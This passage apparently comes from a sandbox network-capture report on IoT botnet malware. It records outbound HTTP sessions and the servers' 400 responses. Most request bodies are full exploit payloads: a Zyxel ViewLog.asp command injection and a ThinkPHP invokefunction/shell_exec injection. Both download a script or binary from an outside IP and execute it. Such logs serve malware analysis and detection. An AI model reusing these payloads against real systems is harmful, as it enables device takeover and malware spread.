                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:01.626760006 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:44.628779888 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            218192.168.2.234124431.7.42.708080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:18.049226999 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            219192.168.2.2351524112.196.24.5780
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:19.518569946 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            220192.168.2.2350784112.31.114.22480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:19.541656971 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:19.902564049 CET527INHTTP/1.1 400 Bad Request
                                                            Server: Byte-nginx
                                                            Date: Wed, 14 Feb 2024 08:28:19 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 230
                                                            Connection: close
                                                            via: cache06.ahchuzhou-cm03
                                                            x-request-ip: 81.181.57.74
                                                            x-tt-trace-tag: id=5
                                                            x-response-cinfo: 81.181.57.74
                                                            x-response-cache: miss
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 42 79 74 65 2d 6e 67 69 6e 78 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr/>Powered by Byte-nginx<hr><center>tengine</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            221192.168.2.234543295.211.206.15280
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:19.729577065 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:19.933763981 CET1286INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:28:19 GMT
                                                            Server: Apache
                                                            Accept-Ranges: bytes
                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: 0
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20
                                                            Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {
                                                            Feb 14, 2024 09:28:19.933784008 CET1286INData Raw: 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d
                                                            Data Ascii: font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; background-co
                                                            Feb 14, 2024 09:28:19.933800936 CET1286INData Raw: 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72
                                                            Data Ascii: { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer { text-align
                                                            Feb 14, 2024 09:28:19.933819056 CET1286INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                            Data Ascii: } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0; bottom: 0;
                                                            Feb 14, 2024 09:28:19.933837891 CET1286INData Raw: 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66 6f 6a 57 64 49 67 50 66 66 37 59 69 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66
                                                            Data Ascii: bGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGS
                                                            Feb 14, 2024 09:28:19.933856010 CET1286INData Raw: 35 55 33 77 4d 78 69 6f 69 45 72 52 6d 32 6e 75 68 64 38 51 52 43 41 38 49 77 54 52 41 57 31 4f 37 50 41 73 62 74 43 50 79 4d 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52 7a 72 46 74 74 70 68 55 52 2b 4d 76 45 50 53 78 2b 36 6d 2f 70 43 78 45 69 33
                                                            Data Ascii: 5U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGE
                                                            Feb 14, 2024 09:28:19.933866024 CET1096INData Raw: 4c 57 6b 51 38 77 6f 42 4b 79 52 2b 2b 64 55 54 73 75 45 4b 2b 4c 38 70 32 42 44 34 66 47 64 73 66 71 68 78 47 51 54 51 5a 6c 75 48 55 4c 58 72 52 73 55 46 66 42 45 30 4f 67 7a 49 6c 72 61 52 38 76 6b 77 36 71 6e 58 6d 75 44 53 46 38 52 67 53 38
                                                            Data Ascii: LWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hX
                                                            Feb 14, 2024 09:28:19.934108973 CET334INData Raw: 34 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20
                                                            Data Ascii: 400</span> <span class="status-reason">Bad Request</span> </section> <section class="contact-info"> Please forward this error screen to budo110.adriahost.com's <a href="mailto:log@ipadre
                                                            Feb 14, 2024 09:28:19.934128046 CET1286INData Raw: 20 6f 6e 20 57 65 64 6e 65 73 64 61 79 2c 20 31 34 2d 46 65 62 2d 32 30 32 34 20 30 39 3a 32 38 3a 31 39 20 43 45 54 22 3e 20 57 65 62 4d 61 73 74 65 72 3c 2f 61 3e 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 0a 20
                                                            Data Ascii: on Wednesday, 14-Feb-2024 09:28:19 CET"> WebMaster</a>. </section> <p class="reason-text">Your browser sent a request that this server could not understand:</p> </div> <section class="additional-info">
                                                            Feb 14, 2024 09:28:19.934143066 CET24INData Raw: 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: dy></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            222192.168.2.235050495.216.46.1280
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:19.746310949 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            223192.168.2.233615495.163.55.17980
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:19.758487940 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:19.990645885 CET321INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.25.3
                                                            Date: Wed, 14 Feb 2024 08:28:19 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 157
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.3</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            224192.168.2.234288295.101.47.8880
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:19.935890913 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:20.142309904 CET479INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 257
                                                            Expires: Wed, 14 Feb 2024 08:28:20 GMT
                                                            Date: Wed, 14 Feb 2024 08:28:20 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 36 38 66 31 34 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 33 30 30 26 23 34 36 3b 31 32 38 35 35 33 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;a68f1402&#46;1707899300&#46;128553f</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            225192.168.2.234004495.217.68.12380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:19.975423098 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:20.204289913 CET339INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Wed, 14 Feb 2024 08:28:20 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            226192.168.2.234544695.173.180.7480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:20.134315014 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:20.386383057 CET1286INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:28:20 GMT
                                                            Server: Apache
                                                            Upgrade: h2,h2c
                                                            Connection: Upgrade, close
                                                            Accept-Ranges: bytes
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Methods: GET, POST, PUT, DELETE
                                                            Access-Control-Allow-Headers: Authorization
                                                            Content-Type: text/html
                                                            Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 